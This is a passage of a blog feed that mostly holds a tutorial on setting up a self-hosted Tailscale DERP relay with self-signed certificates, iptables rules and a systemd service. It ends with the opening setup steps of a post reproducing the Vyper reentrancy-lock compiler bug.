class="punctuation">&#123;</span></span><br><span class="line">                <span class="comment">// 去除代理设置</span></span><br><span class="line">                <span class="attr">&quot;ALL_PROXY&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span> <span 
class="attr">&quot;all_proxy&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;HTTP_PROXY&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span> <span class="attr">&quot;http_proxy&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span></span><br><span class="line">                <span class="attr">&quot;HTTPS_PROXY&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span> <span class="attr">&quot;https_proxy&quot;</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">null</span></span><span class="punctuation">,</span></span><br><span class="line">            <span class="punctuation">&#125;</span></span><br><span class="line">        <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;Launch derp&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;go&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;request&quot;</span><span class="punctuation">:</span> <span class="string">&quot;launch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;mode&quot;</span><span class="punctuation">:</span> <span 
class="string">&quot;auto&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;program&quot;</span><span class="punctuation">:</span> <span class="string">&quot;cmd/derper&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">                <span class="string">&quot;-c&quot;</span><span class="punctuation">,</span> <span class="string">&quot;/home/kiprey/.derper.key&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="string">&quot;-a&quot;</span><span class="punctuation">,</span> <span class="string">&quot;:8888&quot;</span><span class="punctuation">,</span> <span class="string">&quot;-stun-port&quot;</span><span class="punctuation">,</span> <span class="string">&quot;8889&quot;</span><span class="punctuation">,</span> </span><br><span class="line">                <span class="string">&quot;-http-port&quot;</span><span class="punctuation">,</span> <span class="string">&quot;-1&quot;</span><span class="punctuation">,</span></span><br><span class="line"></span><br><span class="line">                <span class="string">&quot;-hostname&quot;</span><span class="punctuation">,</span> <span class="string">&quot;kiprey-derp&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="string">&quot;--certmode&quot;</span><span class="punctuation">,</span> <span class="string">&quot;manual&quot;</span><span class="punctuation">,</span></span><br><span class="line">                <span class="string">&quot;-certdir&quot;</span><span class="punctuation">,</span> <span class="string">&quot;./certdir&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="punctuation">]</span><span 
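class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;$&#123;workspaceFolder&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><h2 id="六、DERP-搭建总结演示">VI. DERP Setup Summary and Demo</h2><p>This section pulls together everything above and walks through setting up a DERP server from start to finish, as concisely as possible.</p><p><strong>Reminder: the tailscale version used here is v1.52.1 (2023/11/11), git commit <a href="https://github.com/tailscale/tailscale/commit/86c8ab7502a38b4de05308355fe0c847e4e78167">86c8ab75</a>.</strong></p><blockquote><p>The tailscale version is called out explicitly because Tailscale iterates quickly, so this article may no longer apply in a year or two (facepalm).</p></blockquote><h3 id="1-前置条件">1. Prerequisites</h3><p>There is only one requirement: <strong>a public TCP channel that lets TLS traffic through, plus a public UDP channel</strong>.</p><p>No domain name, no CA-issued TLS certificate, no source code changes, and no self-hosted Headscale are needed; any NAT traversal (tunneling) service is enough.</p><p>That is fairly abstract. In practice it means either <strong>one TCP port and one UDP port</strong>, or <strong>a single port that allows both TCP and UDP (mix-port)</strong>. If you only want the derp relay and do not want to run the stun service, the UDP port is not needed.</p><p>Either way, the TCP port <strong>must not restrict TLS traffic</strong>. Such restrictions usually come from the ISP (for example when deploying on a residential public IP) or from the tunneling provider (the provider is responsible for what it tunnels, so it may require real-name verification or similar before it lets a user's TLS traffic through).</p><h3 id="2-安装-DERP">2.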
Install DERP</h3><blockquote><p>Run all of the following commands on the DERP server.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Download the latest release from https://go.dev/dl/ (use the downloaded release, not apt-get install golang)</span></span><br><span class="line">wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">sudo</span> <span class="built_in">rm</span> -rf /usr/local/go &amp;&amp; <span class="built_in">sudo</span> tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">rm</span> go1.21.4.linux-amd64.tar.gz</span><br><span class="line"><span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/usr/local/go/bin</span><br><span class="line"></span><br><span class="line"><span class="comment"># Confirm that the installation succeeded</span></span><br><span class="line">go version</span><br><span class="line"><span class="comment"># Check that GOROOT and GOPATH are non-empty &amp; accessible</span></span><br><span class="line">go <span class="built_in">env</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Configure the go proxy and install derper</span></span><br><span class="line">go <span class="built_in">env</span> -w GOPROXY=https://goproxy.cn,direct</span><br><span class="line">go install tailscale.com/cmd/derper@latest</span><br><span class="line"><span class="comment"># Install derpprobe to help test derper</span></span><br><span class="line">go install
tailscale.com/cmd/derpprobe@latest</span><br></pre></td></tr></table></figure><h3 id="3-启动-DERP">3. Start DERP</h3><p>Expose the ports to the public internet. This can be done through a tunneling service, or by configuring iptables rules on a machine that is already publicly reachable:</p><blockquote><p>Note: iptables rules are evaluated in order, so the new rules must be inserted before the DROP all rule.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># TCP inbound: insert a rule at position 10 of the INPUT chain that accepts TCP connections to dest-port 8888</span></span><br><span class="line"><span class="built_in">sudo</span> iptables -I INPUT 10 -p tcp --dport 8888 -j ACCEPT</span><br><span class="line"><span class="comment"># UDP inbound: insert a rule at position 10 of the INPUT chain that accepts UDP traffic to dest-port 8889</span></span><br><span class="line"><span class="built_in">sudo</span> iptables -I INPUT 10 -p udp --dport 8889 -j ACCEPT</span><br><span class="line"></span><br><span class="line"><span class="comment"># --------------</span></span><br><span class="line"><span class="comment"># Inspect iptables</span></span><br><span class="line">$ <span class="built_in">sudo</span> iptables -L -n</span><br><span class="line">Chain INPUT (policy ACCEPT)</span><br><span class="line">target     prot opt <span class="built_in">source</span>               destination</span><br><span class="line">ACCEPT     icmp --  0.0.0.0/0            0.0.0.0/0</span><br><span class="line">...</span><br><span class="line">ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:8889</span><br><span class="line">ACCEPT     tcp  --  0.0.0.0/0
0.0.0.0/0            tcp dpt:8888</span><br><span class="line">DROP       all  --  0.0.0.0/0            0.0.0.0/0</span><br></pre></td></tr></table></figure><p>接下来，配置并启动 DERP 服务。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 指定 DERP_HOST 为 kiprey-derp（后面会用）</span></span><br><span class="line">DERP_HOST=<span class="string">&quot;kiprey-derp&quot;</span></span><br><span class="line">DERP_PORT=8888</span><br><span class="line">STUN_PORT=8889</span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建自签名证书</span></span><br><span class="line"><span class="built_in">mkdir</span> ~/certdir &amp;&amp; <span class="built_in">cd</span> ~/certdir</span><br><span class="line">openssl genpkey -algorithm RSA -out <span class="variable">$&#123;DERP_HOST&#125;</span>.key   </span><br><span class="line">openssl req -new -key <span class="variable">$&#123;DERP_HOST&#125;</span>.key -out <span class="variable">$&#123;DERP_HOST&#125;</span>.csr</span><br><span class="line">openssl x509 -req \</span><br><span class="line">-days 36500 \</span><br><span 
class="line">-<span class="keyword">in</span> <span class="variable">$&#123;DERP_HOST&#125;</span>.csr \</span><br><span class="line">-signkey <span class="variable">$&#123;DERP_HOST&#125;</span>.key \</span><br><span class="line">-out <span class="variable">$&#123;DERP_HOST&#125;</span>.crt \</span><br><span class="line">-extfile &lt;(<span class="built_in">printf</span> <span class="string">&quot;subjectAltName=DNS:<span class="variable">$&#123;DERP_HOST&#125;</span>&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 启动 DERP 服务（中继和stun）</span></span><br><span class="line"><span class="comment"># --verify-clients 需要本地运行 tailscaled，我在这里省略了安装 tailscale 的步骤</span></span><br><span class="line">~/go/bin/derper \</span><br><span class="line">    -c ~/.derper.key \</span><br><span class="line">    -a :<span class="variable">$&#123;DERP_PORT&#125;</span> -http-port -1 \</span><br><span class="line">    -stun-port <span class="variable">$&#123;STUN_PORT&#125;</span> \</span><br><span class="line">    -hostname <span class="variable">$&#123;DERP_HOST&#125;</span> \</span><br><span class="line">    --certmode manual \</span><br><span class="line">    -certdir ~/certdir \</span><br><span class="line">    --verify-clients</span><br></pre></td></tr></table></figure><p>启动 DERP 服务后，在<strong>另一台机器上</strong>做连通性测试：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 这里的 DERP_HOST 要与 DERP 服务上的一致</span></span><br><span class="line">DERP_HOST=<span class="string">&quot;kiprey-derp&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 以下是 DERP 服务的公网视角，即如何从公网连接其地址和端口。</span></span><br><span class="line"><span class="comment"># 如果存在端口转发，则这里的端口会和上面 DERP 服务本地监听的端口不同，请自行配置</span></span><br><span class="line">DERP_PUB_IP=<span class="string">&quot;a.b.c.d&quot;</span></span><br><span class="line">DERP_PUB_PORT=8888</span><br><span class="line">STUN_PUB_PORT=8889</span><br><span class="line"></span><br><span class="line">$ <span class="built_in">unset</span> all_proxy http_proxy https_proxy</span><br><span class="line">$ curl --insecure --resolve <span class="string">&quot;<span class="variable">$&#123;DERP_HOST&#125;</span>:<span class="variable">$&#123;DERP_PUB_PORT&#125;</span>:<span class="variable">$&#123;DERP_PUB_IP&#125;</span>&quot;</span> <span class="string">&quot;https://<span class="variable">$&#123;DERP_HOST&#125;</span>:<span class="variable">$&#123;DERP_PUB_PORT&#125;</span>&quot;</span></span><br><span class="line"></span><br><span class="line">&lt;html&gt;&lt;body&gt;</span><br><span class="line">&lt;h1&gt;DERP&lt;/h1&gt;</span><br><span class="line">&lt;p&gt;</span><br><span class="line">  This is a</span><br><span class="line">  &lt;a href=<span class="string">&quot;https://tailscale.com/&quot;</span>&gt;Tailscale&lt;/a&gt;</span><br><span class="line">  &lt;a href=<span class="string">&quot;https://pkg.go.dev/tailscale.com/derp&quot;</span>&gt;DERP&lt;/a&gt;</span><br><span class="line">  server.</span><br><span class="line">&lt;/p&gt;</span><br><span 
class="line"></span><br><span class="line"><span class="comment"># 测试 UDP 协议 STUN 服务的连通性</span></span><br><span class="line">$ nc <span class="variable">$&#123;DERP_PUB_IP&#125;</span> <span class="variable">$&#123;STUN_PUB_PORT&#125;</span> -v -u</span><br><span class="line"></span><br><span class="line">Connection to a.b.c.d e port [udp/*] succeeded!</span><br></pre></td></tr></table></figure><p>连通性测试通过后，DERP 服务器上先<strong>关闭 derp 服务</strong>，创建 service 来让它开机自启：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">DERP_HOST=<span class="string">&quot;kiprey-derp&quot;</span></span><br><span class="line">DERP_PORT=8888</span><br><span 
class="line">STUN_PORT=8889</span><br><span class="line"></span><br><span class="line"><span class="comment"># 创建service文件</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">&quot;[Unit]</span></span><br><span class="line"><span class="string">Description=Tailscale derp service</span></span><br><span class="line"><span class="string">After=network.target</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[Service]</span></span><br><span class="line"><span class="string">ExecStart=/home/<span class="variable">$&#123;USER&#125;</span>/go/bin/derper \</span></span><br><span class="line"><span class="string">    -c /home/<span class="variable">$&#123;USER&#125;</span>/.derper.key \</span></span><br><span class="line"><span class="string">    -a :<span class="variable">$&#123;DERP_PORT&#125;</span> -http-port -1 \</span></span><br><span class="line"><span class="string">    -stun-port <span class="variable">$&#123;STUN_PORT&#125;</span> \</span></span><br><span class="line"><span class="string">    -hostname <span class="variable">$&#123;DERP_HOST&#125;</span> \</span></span><br><span class="line"><span class="string">    --certmode manual \</span></span><br><span class="line"><span class="string">    -certdir /home/<span class="variable">$&#123;USER&#125;</span>/certdir \</span></span><br><span class="line"><span class="string">    --verify-clients</span></span><br><span class="line"><span class="string">Restart=always</span></span><br><span class="line"><span class="string">User=<span class="variable">$&#123;USER&#125;</span></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[Install]</span></span><br><span class="line"><span class="string">WantedBy=multi-user.target&quot;</span> \</span><br><span class="line">| <span class="built_in">sudo</span> <span class="built_in">tee</span> 
/etc/systemd/system/tailscale-derp.service</span><br><span class="line"></span><br><span class="line"><span class="comment"># 重新加载Systemd配置</span></span><br><span class="line"><span class="built_in">sudo</span> systemctl daemon-reload</span><br><span class="line"></span><br><span class="line"><span class="comment"># 启动服务并设置开机自启动</span></span><br><span class="line"><span class="built_in">sudo</span> systemctl start tailscale-derp</span><br><span class="line"><span class="built_in">sudo</span> systemctl <span class="built_in">enable</span> tailscale-derp</span><br><span class="line"></span><br><span class="line"><span class="comment"># 查看服务状态，没问题就行</span></span><br><span class="line"><span class="comment"># 如果有问题那就得看看是不是之前的 derper 忘记关了，导致端口占用</span></span><br><span class="line"><span class="built_in">sudo</span> systemctl status tailscale-derp</span><br><span class="line"></span><br><span class="line"><span class="comment"># -------------------</span></span><br><span class="line"><span class="comment"># 如需禁用</span></span><br><span class="line"><span class="built_in">sudo</span> systemctl stop tailscale-derp</span><br><span class="line"><span class="built_in">sudo</span> systemctl <span class="built_in">disable</span> tailscale-derp</span><br></pre></td></tr></table></figure><blockquote><p>到这里后，DERP 服务配置完成。</p></blockquote><h3 id="4-配置-ACL">4. 
Configure the ACL</h3><p>Next, open the Tailscale admin panel in a browser and edit the ACL so that the configuration of every tailscale node gets updated.</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">...</span><br><span class="line"><span class="attr">&quot;acls&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span>...<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">...</span><br><span class="line"><span class="attr">&quot;ssh&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span>...<span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line">  ...</span><br><span class="line"><span class="attr">&quot;derpMap&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line"><span class="attr">&quot;Regions&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span
class="line"><span class="attr">&quot;900&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line"><span class="attr">&quot;RegionID&quot;</span><span class="punctuation">:</span>   <span class="number">900</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;RegionCode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;MyDerp&quot;</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;Nodes&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line"><span class="attr">&quot;Name&quot;</span><span class="punctuation">:</span>             <span class="string">&quot;MyDerp-Name&quot;</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;RegionID&quot;</span><span class="punctuation">:</span>         <span class="number">900</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;HostName&quot;</span><span class="punctuation">:</span>         <span class="string">&quot;kiprey-derp&quot;</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;IPv4&quot;</span><span class="punctuation">:</span>             <span class="string">&quot;a.b.c.d&quot;</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;DERPPort&quot;</span><span class="punctuation">:</span>         <span class="number">8888</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;STUNPort&quot;</span><span class="punctuation">:</span>         <span class="number">8889</span><span class="punctuation">,</span></span><br><span class="line"><span class="attr">&quot;InsecureForTests&quot;</span><span class="punctuation">:</span> <span 
class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line"><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">  ...</span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><h3 id="5-演示">5. Demo</h3><p>Once the ACL is saved in the web page, it is pushed to every tailscale node immediately. Run netcheck on any node and the new DERP region shows up:</p><p><img src="/2023/11/tailscale-derp/Untitled%209.png" alt="Untitled"></p><h2 id="七、参考链接">VII. References</h2><ul><li><a href="https://tailscale.com/kb/1232/derp-servers/">DERP Servers - Tailscale Documentation</a></li><li><a href="https://icloudnative.io/posts/custom-derp-servers/">Tailscale 基础教程：部署私有 DERP 中继服务器 - 云原生</a></li><li><a href="https://tailscale.com/kb/1118/custom-derp-servers/">Custom DERP Servers - Tailscale Documentation</a></li><li><a href="http://www.cppblog.com/peakflys/archive/2013/01/25/197562.html">p2p的原理和常见的实现方式 - cppblog</a></li><li><a href="https://tailscale.com/blog/how-nat-traversal-works/">How NAT traversal works - Tailscale Blog</a></li><li>The code referenced throughout this post, plus various other blog posts too minor to list here</li></ul>]]></content>
    
    
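    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;tailscale is a very handy tool, mainly used to network machines across different locations, and it ships with several advanced features (such as Magic DNS) that make it convenient to use.&lt;/p&gt;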
&lt;blockquote&gt;
&lt;p&gt;This is why I dropped Zerotier for Tailscale: it has many advanced features and is very convenient to use.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;tailscale's underlying mechanism differs from zerotier's.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;zerotier has every client &lt;strong&gt;attempt hole punching with the other clients as soon as it starts&lt;/strong&gt;, and then keeps those connections alive.
&lt;ul&gt;
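&lt;li&gt;Pro: connections are established very quickly. Either hole punching has already succeeded, or it is already certain that traffic must go through a relay node.&lt;/li&gt;
&lt;li&gt;Con: hole-punched connections to all peers must be maintained, which consumes resources. The overhead grows as the number of nodes increases.&lt;/li&gt;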
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;tailscale &lt;strong&gt;only attempts hole punching when it actually needs to connect to a peer&lt;/strong&gt;, and the initial traffic always goes through a DERP relay server. (Very lazy…)
&lt;ul&gt;
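&lt;li&gt;Pro: with this lazy approach there is no need to maintain hole-punched connections to other nodes, or any other state, in advance.&lt;/li&gt;
&lt;li&gt;Con: each time a virtual connection is created through tailscale, &lt;strong&gt;the initial connection has high latency&lt;/strong&gt;, which noticeably hurts the experience; &lt;strong&gt;tailscale depends heavily on relay nodes&lt;/strong&gt;.&lt;/li&gt;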
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
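&lt;p&gt;In a P2P VPN, &lt;strong&gt;self-hosted relay nodes&lt;/strong&gt; matter a great deal. On one hand, a self-hosted relay can &lt;strong&gt;observe and coordinate the p2p process between two local peers better&lt;/strong&gt; than a geographically distant official relay; on the other hand, it can &lt;strong&gt;quickly relay and forward traffic&lt;/strong&gt; when hole punching fails.&lt;/p&gt;
&lt;p&gt;My earlier post covered the principles and process of setting up Moon, Zerotier's relay node. Zerotier listens for UDP connections on a specific Primary Port, 9993, to relay data, so in practice &lt;strong&gt;only this one UDP port needs to be exposed to the public internet&lt;/strong&gt;, which is a very low bar. A port can be exposed in many ways, for example through a tunneling tool such as FRP, so &lt;em&gt;a moon node does not even need an IP address of its own&lt;/em&gt;.&lt;/p&gt;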
&lt;blockquote&gt;
&lt;p&gt;Note: Zerotier does not support self-hosted TCP relays; a moon node is really just a UDP relay node.&lt;/p&gt;
&lt;/blockquote&gt;
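&lt;p&gt;Setting up Tailscale's relay server (called the DERP service) is somewhat harder than with zerotier, and the tutorials online vary wildly in quality (as painful as when I was hunting for Zerotier Moon setup guides, which deserves a good rant). So next we will try to find the simplest way to build a tailscale DERP server, and learn some of how the DERP service works along the way.&lt;/p&gt;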
&lt;blockquote&gt;
&lt;p&gt;Tailscale's DERP relay service is a &lt;strong&gt;TCP&lt;/strong&gt; relay node, the exact opposite of Zerotier.&lt;/p&gt;
&lt;/blockquote&gt;
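&lt;p&gt;&lt;strong&gt;TL;DR&lt;/strong&gt;: to skip the background and go straight to the setup steps, jump to the &lt;strong&gt;summary section&lt;/strong&gt; at the end of this post.&lt;/p&gt;
&lt;p&gt;After reading this post you will know how to quickly build a Tailscale DERP service with &lt;strong&gt;no public-facing machine, no domain name, no CA-issued certificate, no source code changes, and no self-hosted HeadScale service&lt;/strong&gt;, using &lt;strong&gt;just 1-2 ports&lt;/strong&gt;.&lt;/p&gt;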
&lt;blockquote&gt;
&lt;p&gt;Note that this post only covers tailscale, not headscale, because I want the setup to stay as simple as possible and do not want to deploy a separate headscale control server.&lt;/p&gt;
&lt;/blockquote&gt;</summary>
    
    
    
    <category term="Tools" scheme="https://kiprey.github.io/categories/Tools/"/>
    
    
    <category term="Tailscale" scheme="https://kiprey.github.io/tags/Tailscale/"/>
    
  </entry>
  
  <entry>
    <title>Reproducing the Curve Finance Vulnerability</title>
    <link href="https://kiprey.github.io/2023/08/curve_finance_vuln/"/>
    <id>https://kiprey.github.io/2023/08/curve_finance_vuln/</id>
    <published>2023-08-09T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.969Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>Smart contracts play an important role in the blockchain world. This post records my reproduction of a compilation bug in Vyper, the compiler for a Pythonic smart contract language. The bug rendered the reentrancy locks in compiled contracts ineffective, leaving those contracts vulnerable to <strong>reentrancy attacks</strong>.</p><span id="more"></span><h2 id="二、环境搭建">II. Environment Setup</h2><h3 id="1-Vyper-构建">1. Building Vyper</h3><p>Download the Vyper compiler source and install its dependencies with pip.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:vyperlang/vyper.git</span><br><span class="line"><span class="built_in">cd</span> vyper</span><br><span class="line"></span><br><span class="line"><span class="comment"># Dependencies taken from setup.py &amp; requirements-docs.txt; do not copy this list blindly</span></span><br><span class="line">pip3 install <span class="string">&quot;asttokens&gt;=2.0.5,&lt;3&quot;</span> <span class="string">&quot;pycryptodome&gt;=3.5.1,&lt;4&quot;</span> <span class="string">&quot;semantic-version&gt;=2.10,&lt;3&quot;</span> <span class="string">&quot;importlib-metadata&quot;</span> <span class="string">&quot;wheel&quot;</span> <span class="string">&quot;sphinx==4.5.0&quot;</span> <span class="string">&quot;recommonmark==0.6.0&quot;</span> <span class="string">&quot;sphinx_rtd_theme==0.5.2&quot;</span></span><br></pre></td></tr></table></figure><p>Run <code>python3 -m vyper --help</code>; if it prints the help text, the setup works:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span
class="line">15</span><br></pre></td><td class="code"><pre><span class="line">$ python3 -m vyper --<span class="built_in">help</span></span><br><span class="line">usage: __main__.py [-h] [--version] [--show-gas-estimates] [-f FORMAT] [--storage-layout-file STORAGE_LAYOUT [STORAGE_LAYOUT ...]]</span><br><span class="line">                   [--evm-version &#123;istanbul,berlin,london,paris,shanghai,cancun&#125;] [--no-optimize] [--optimize &#123;gas,codesize,none&#125;] [--debug] [--no-bytecode-metadata]</span><br><span class="line">                   [--traceback-limit TRACEBACK_LIMIT] [--verbose] [--standard-json] [--hex-ir] [-p ROOT_FOLDER] [-o OUTPUT_PATH]</span><br><span class="line">                   input_files [input_files ...]</span><br><span class="line"></span><br><span class="line">Pythonic Smart Contract Language <span class="keyword">for</span> the EVM</span><br><span class="line"></span><br><span class="line">positional arguments:</span><br><span class="line">  input_files           Vyper sourcecode to compile</span><br><span class="line"></span><br><span class="line">options:</span><br><span class="line">  -h, --<span class="built_in">help</span>            show this <span class="built_in">help</span> message and <span class="built_in">exit</span></span><br><span class="line">  --version             show program<span class="string">&#x27;s version number and exit</span></span><br><span class="line"><span class="string">  ...</span></span><br></pre></td></tr></table></figure><p>Finally, check out the commit that introduced the vulnerability:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># https://github.com/vyperlang/vyper/commit/a09cdddd8ba249d1ce68ac31ec4496e50b8a25c7</span></span><br><span class="line">git checkout a09cdddd</span><br></pre></td></tr></table></figure><p>To step through the compiler in a debugger, you also need:</p><figure class="highlight bash"><table><tr><td
